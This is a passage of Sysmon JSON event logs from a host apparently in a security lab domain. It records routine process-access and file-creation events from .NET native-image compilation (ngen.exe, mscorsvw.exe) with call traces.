C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:03.966","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1396-5F25-0000-0010C04E1000}","TargetProcessId":"4908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8975,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:03.966\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1396-5F25-0000-0010C04E1000}\r\nTargetProcessId: 4908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:03.966","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1396-5F25-0000-0010C04E1000}","TargetProcessId":"4908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8976,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:03.966\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1396-5F25-0000-0010C04E1000}\r\nTargetProcessId: 4908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:03.966","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1396-5F25-0000-0010C04E1000}","TargetProcessId":"4908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:04","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8977,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:03:04.123\r\nProcessGuid: {E2A3D6B1-13A7-5F25-0000-0010FB101100}\r\nProcessId: 4908\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\132c-0\\XsdBuildTask.dll\r\nCreationUtcTime: 2020-08-01 07:03:04.123","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:03:04.123","ProcessGuid":"{E2A3D6B1-13A7-5F25-0000-0010FB101100}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\132c-0\\XsdBuildTask.dll","CreationUtcTime":"2020-08-01 07:03:04.123","EventReceivedTime":"2020-08-01 07:03:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:04","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8978,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:04.279\r\nSourceProcessGUID: {E2A3D6B1-12B4-5F25-0000-0010BF860900}\r\nSourceProcessId: 1172\r\nSourceThreadId: 3044\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe\r\nTargetProcessGUID: {E2A3D6B1-13A3-5F25-0000-00104BB51000}\r\nTargetProcessId: 4116\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.dll+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.DLL+32979|UNKNOWN(00007FFF44575147)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:04.279","SourceProcessGUID":"{E2A3D6B1-12B4-5F25-0000-0010BF860900}","SourceProcessId":"1172","SourceThreadId":"3044","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe","TargetProcessGUID":"{E2A3D6B1-13A3-5F25-0000-00104BB51000}","TargetProcessId":"4116","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.dll+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.DLL+32979|UNKNOWN(00007FFF44575147)","EventReceivedTime":"2020-08-01 07:03:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:04","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8979,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:04.279\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13A3-5F25-0000-00104BB51000}\r\nTargetProcessId: 4116\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:04.279","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13A3-5F25-0000-00104BB51000}","TargetProcessId":"4116","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:04","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8980,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:04.279\r\nSourceProcessGUID: {E2A3D6B1-12B4-5F25-0000-001036870900}\r\nSourceProcessId: 4156\r\nSourceThreadId: 2180\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-13A3-5F25-0000-00104BB51000}\r\nTargetProcessId: 4116\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:04.279","SourceProcessGUID":"{E2A3D6B1-12B4-5F25-0000-001036870900}","SourceProcessId":"4156","SourceThreadId":"2180","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-13A3-5F25-0000-00104BB51000}","TargetProcessId":"4116","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:04","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8981,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:04.294\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-13A8-5F25-0000-00104E351100}\r\nTargetProcessId: 4116\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:04.294","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-13A8-5F25-0000-00104E351100}","TargetProcessId":"4116","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:04","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8982,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:04.294\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-13A8-5F25-0000-00104E351100}\r\nTargetProcessId: 4116\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:04.294","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-13A8-5F25-0000-00104E351100}","TargetProcessId":"4116","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:04","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8983,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:04.419\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12B4-5F25-0000-0010BF860900}\r\nTargetProcessId: 1172\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:04.419","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12B4-5F25-0000-0010BF860900}","TargetProcessId":"1172","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
